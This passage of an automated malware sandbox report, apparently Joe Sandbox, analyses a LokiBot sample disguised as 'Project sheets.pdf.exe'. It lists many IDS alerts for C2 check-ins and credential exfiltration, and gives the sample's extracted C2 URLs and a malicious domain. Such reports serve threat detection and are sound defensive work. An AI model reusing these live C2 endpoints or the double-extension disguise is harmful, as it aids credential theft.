Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240
SID:	2024313
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252
SID:	2024313
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221
SID:	2825766
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385
SID:	2025381
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156
SID:	2025381
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100
SID:	2825766
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991
SID:	2825766
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573
SID:	2825766
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 188.114.97.3 - Destination IP: 192.168.2.3

Timestamp:	188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563
SID:	2025483
Source Port:	80
Destination Port:	49798
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436
SID:	2825766
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803
SID:	2825766
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258
SID:	2825766
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407
SID:	2024318
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397
SID:	2024318
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573
SID:	2021641
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291
SID:	2025381
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786
SID:	2825766
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484
SID:	2825766
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://tixfilmz.gq/Devil/PWS/fre.php

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: Project sheets.pdf.exe

Joe Sandbox ML: detected

Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Source: Project sheets.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Project sheets.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49742 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49743 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49743 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49744 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49745 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49746 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49747 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49748 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49749 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49750 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49751 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49752 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49753 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49754 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49755 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49756 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49757 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49758 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49759 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49760 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49761 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49762 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49763 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49764 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49766 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49774 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49777 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49777 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49778 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 188.114.97.3:80
